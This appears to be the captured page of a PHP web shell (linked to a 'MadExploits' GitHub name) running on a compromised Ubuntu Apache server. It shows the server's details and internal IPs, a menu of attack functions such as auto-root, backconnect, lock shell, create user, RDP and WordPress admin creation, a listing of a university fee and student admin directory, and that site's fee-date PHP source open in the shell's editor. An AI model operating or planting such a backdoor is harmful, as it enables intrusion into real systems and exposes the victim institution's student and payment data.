Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
conreg /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
adAdminUser.php
7.42
KB
-rw-r--r--
adminDashboard-old.php
5.95
KB
-rw-r--r--
adminDashboard.php
26.61
KB
-rw-r--r--
adminDashboardaug22.php
7.32
KB
-rw-r--r--
adminDashboardjan22.php
6.51
KB
-rw-r--r--
batch.php
344
B
-rw-r--r--
changePassword.php
4.61
KB
-rw-r--r--
class.admin.php
4.23
KB
-rw-r--r--
common.php
2.28
KB
-rw-r--r--
dbconfig.php
1.31
KB
-rw-r--r--
delete_member.php
446
B
-rw-r--r--
delete_memberD.php
456
B
-rw-r--r--
error_log
2.03
KB
-rw-r--r--
exportHostelFee.php
1.17
KB
-rw-r--r--
exportStudentApplicatonDetails...
2.64
KB
-rw-r--r--
exportStudentDetails.php
976
B
-rw-r--r--
exportStudentDetailsaug22.php
0
B
-rw-r--r--
exportStudentDetailsjan22.php
754
B
-rw-r--r--
exportTutionFee.php
1.22
KB
-rw-r--r--
exportTutionFeeSearch.php
1.22
KB
-rw-r--r--
exportcseduApplicatonDetails.p...
1.08
KB
-rw-r--r--
exportcseduApplicatonDetailsau...
1.09
KB
-rw-r--r--
exportcseduApplicatonDetailsja...
1.09
KB
-rw-r--r--
exportcseduFeeDetails.php
817
B
-rw-r--r--
exportcseduFeeDetailsaug22.php
830
B
-rw-r--r--
exportcseduFeeDetailsjan22.php
830
B
-rw-r--r--
forgotPassword.php
6.53
KB
-rw-r--r--
fpass.php
2.97
KB
-rw-r--r--
index.php
4.83
KB
-rw-r--r--
invoice.php
5.78
KB
-rw-r--r--
invoiceHostel.php
4.9
KB
-rw-r--r--
jquery.tableToExcel.js
2.76
KB
-rw-r--r--
logout.php
600
B
-rw-r--r--
register.php
6.62
KB
-rw-r--r--
resetpass.php
5.09
KB
-rw-r--r--
tutionFee.php
19.89
KB
-rw-r--r--
updateBatch.php
5.9
KB
-rw-r--r--
updateBatchFee.php
7.1
KB
-rw-r--r--
updateFeeDate.php
9.87
KB
-rw-r--r--
verify.php
2.46
KB
-rw-r--r--
viewApplicationDetailsaug22.ph...
6.18
KB
-rw-r--r--
viewApplicationDetailsjan22.ph...
6.18
KB
-rw-r--r--
viewApplicatonDetails.php
6.16
KB
-rw-r--r--
viewHostelFee.php
9.22
KB
-rw-r--r--
viewPaymentDetails.php
4.86
KB
-rw-r--r--
viewPaymentDetailsaug22.php
4.89
KB
-rw-r--r--
viewPaymentDetailsjan22.php
4.91
KB
-rw-r--r--
viewStudentDetails-old.php
13.75
KB
-rw-r--r--
viewStudentDetails.php
20.86
KB
-rw-r--r--
viewTutionFee.php
9.46
KB
-rw-r--r--
viewapplications.php
13.75
KB
-rw-r--r--
viewapplicationsjan22.php
14.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : updateFeeDate.php
<?php ob_start(); require __DIR__ . DIRECTORY_SEPARATOR . "lib" . DIRECTORY_SEPARATOR . "config.php"; // HTML require PATH_LIB . "page-top.php"; require_once 'common.php'; $admin_date = new ADMINFEEDATE(); if(isset($_POST['btn-submit'])) { $program = trim($_POST['program']); $semester = trim($_POST['semester']); $firstDate = trim($_POST['firstDate']); $secondDate = trim($_POST['secondDate']); $thirdDate = trim($_POST['thirdDate']); $forthDate = trim($_POST['forthDate']); $secondFineAmount = trim($_POST['secondFineAmount']); $firstFineamount = trim($_POST['firstFineamount']); if(empty($firstDate)){ $errMSG = "Please Enter First Date."; } else if(empty($secondDate)){ $errMSG = "Please Enter Second Date."; } else if(empty($thirdDate)){ $errMSG = "Please Third Date."; } else if(empty($forthDate)){ $errMSG = "Please Forth Date."; } else if(empty($firstFineamount)){ $errMSG = "Please Enter Fine Amount."; } else if(empty($secondFineAmount)){ $errMSG = "Please Enter Second Fine Amount."; } if(!isset($errMSG)) { $stmt = $admin_date->runQuery("SELECT * FROM feesubmitdate WHERE semester=:semester1"); $stmt->execute(array(":semester1"=>$semester)); $rows = $stmt->fetch(PDO::FETCH_ASSOC); $a = $rows['semester']; if($stmt->rowCount() > 0) { $errMSG = "You have already submited date $a "; } else { if($admin_date->adminfee($program,$semester,$firstDate,$secondDate,$thirdDate,$forthDate,$firstFineamount,$secondFineAmount)) { $successMSG = "Fee submition Date has been updated successfuly..."; } else { $errMSG = "sorry , Query could no execute..."; } } } } ?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Update Fee Date <!--<small>Control panel</small> --> </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active">Update Fee Date</li> </ol> </section> <!-- Main content --> <section class="content"> <form id="tutionFee" name="tutionFee" action="updateFeeDate.php?authToken=<?php echo $tokenAuth;?>" method="post"> <!-- SELECT2 EXAMPLE --> <div class="box box-default"> <div class="box-header with-border"> <h3 class="box-title">Update Fee Date</h3> </div> <div class="box-body"> <?php if(isset($errMSG)){ ?> <div class="alert alert-danger alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4><i class="icon fa fa-ban"></i> Alert! <?php echo $errMSG; ?></h4> </div> <?php } else if(isset($successMSG)){ ?> <div class="alert alert-success alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4><i class="icon fa fa-check"></i> Alert! <?php echo $successMSG; ?></h4> </div> <?php } ?> </div> <!-- /.box-header --> <div class="box-body"> <div class="row"> <div class="col-md-6"> <div class="form-group"> <label>Program</label> <select class="form-control select2" style="width: 100%;" name="program" id="program" required > <option value="" selected="selected">-- Select Program--</option> <option value="B. Tech">B. Tech</option> <option value="M. Tech">M. Tech</option> <option value="PhD">PhD</option> </select> </div> <!-- /.form-group --> <div class="form-group form-grp"> <label>First Date</label> <div class="input-group date"> <div class="input-group-addon"> <i class="fa fa-calendar"></i> </div> <input type="text" class="form-control pull-right paymentv" id="datepicker1" name="firstDate" placeholder="MM/DD/YYYY" autocomplete="off"> </div> </div> <div class="form-group form-grp"> <label>Second Date</label> <div class="input-group date"> <div class="input-group-addon"> <i class="fa fa-calendar"></i> </div> <input type="text" class="form-control pull-right paymentv" id="datepicker2" name="secondDate" placeholder="MM/DD/YYYY" autocomplete="off"> </div> </div> <!-- /.form-group --> <!-- /.form-group --> <div class="form-group"> <label>First Fine Amount</label> <input type="text" class="form-control paymentv" name="firstFineamount" placeholder="Enter Fine Amount ..."> </div> </div> <div class="col-md-6"> <div class="form-group"> <label>Semester</label> <select class="form-control select2" style="width: 100%;" name="semester" id="semester" required > <option value="" selected >-- Select Semester--</option> <option value="Semester I">Semester I</option> <option value="Semester II">Semester II</option> <option value="Semester III">Semester III</option> <option value="Semester IV">Semester IV</option> <option value="Semester V">Semester V</option> <option value="Semester VI">Semester VI</option> <option value="Semester VII">Semester VII</option> <option value="Semester VIII">Semester VIII</option> <option value="Semester IX">Semester IX</option> <option value="Semester X">Semester X</option> <option value="Semester XI">Semester XI</option> <option value="Semester XII">Semester XII</option> <option value="Semester XIII">Semester XIII</option> <option value="Semester XIV">Semester XIV</option> <option value="Semester XV">Semester XV</option> <option value="Semester XVI">Semester XVI</option> </select> </div> <div class="form-group form-grp"> <label>Third Date</label> <div class="input-group date"> <div class="input-group-addon"> <i class="fa fa-calendar"></i> </div> <input type="text" class="form-control pull-right paymentv" id="datepicker3" name="thirdDate" placeholder="MM/DD/YYYY" autocomplete="off"> </div> </div> <!-- /.form-group --> <div class="form-group form-grp"> <label>Fourth Date</label> <div class="input-group date"> <div class="input-group-addon"> <i class="fa fa-calendar"></i> </div> <input type="text" class="form-control pull-right paymentv" id="datepicker4" name="forthDate" placeholder="MM/DD/YYYY" autocomplete="off"> </div> </div> <div class="form-group"> <label>Second Fine Amount</label> <input type="text" class="form-control paymentv" name="secondFineAmount" placeholder="Enter Fine Amount ..."> </div> </div> <!-- /.col --> </div> <!-- /.row --> <!-- /.box-body --> <div class="box-footer"> <button type="submit" class="btn btn-default">Cancel</button> <button type="submit" name="btn-submit" class="btn btn-info">Submit</button> </div> </div> <!-- /.box --> </form> </section> <!-- /.content --> <section class="content"> <div class="row"> <div class="col-xs-12" style="padding-left: 0px; padding-right: 0px;"> <div class="box"> <div class="box-header"> <h3 class="box-title"><strong>Fee submition date </strong></h3> </div> <!-- /.box-header --> <div class="box-body"> <table id="example3" class="table table-bordered table-striped"> <thead> <tr> <th>Program</th> <th>Semester</th> <th>First Date</th> <th>Second Date</th> <th>Third Date</th> <th>Forth Date</th> <th>First Fine Amount</th> <th>Second Fine Amount</th> <th>Edit</th> </tr> </thead> <tbody> <?php $result = $DB_con->prepare("SELECT * FROM feesubmitdate "); $result->execute(); for($i=0; $row = $result->fetch(); $i++){ ?> <tr> <td><?php echo $row ['program']; ?></td> <td><?php echo $row ['semester']; ?></td> <td><?php echo $row ['firstDate']; ?></td> <td><?php echo $row ['secondDate']; ?></td> <td><?php echo $row ['thirdDate']; ?></td> <td><?php echo $row ['forthDate']; ?></td> <td><?php echo $row ['firstFineamount']; ?></td> <td><?php echo $row ['secondFineAmount']; $hid = base64_encode( $row['feeID']);?></td> <td><a href="editLastdate.php?in=<?php echo $hid; ?>&authToken=<?php echo $tokenAuth; ?>"><i class="fa fa-eye" style="font-size: 25px;"></i></a></td> </tr> <?php } ?> </tfoot> </table> </div> <!-- /.box-body --> </div> <!-- /.box --> </div> <!-- /.col --> </div> <!-- /.row --> </section> </div> <!-- /.content-wrapper --> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?>
Close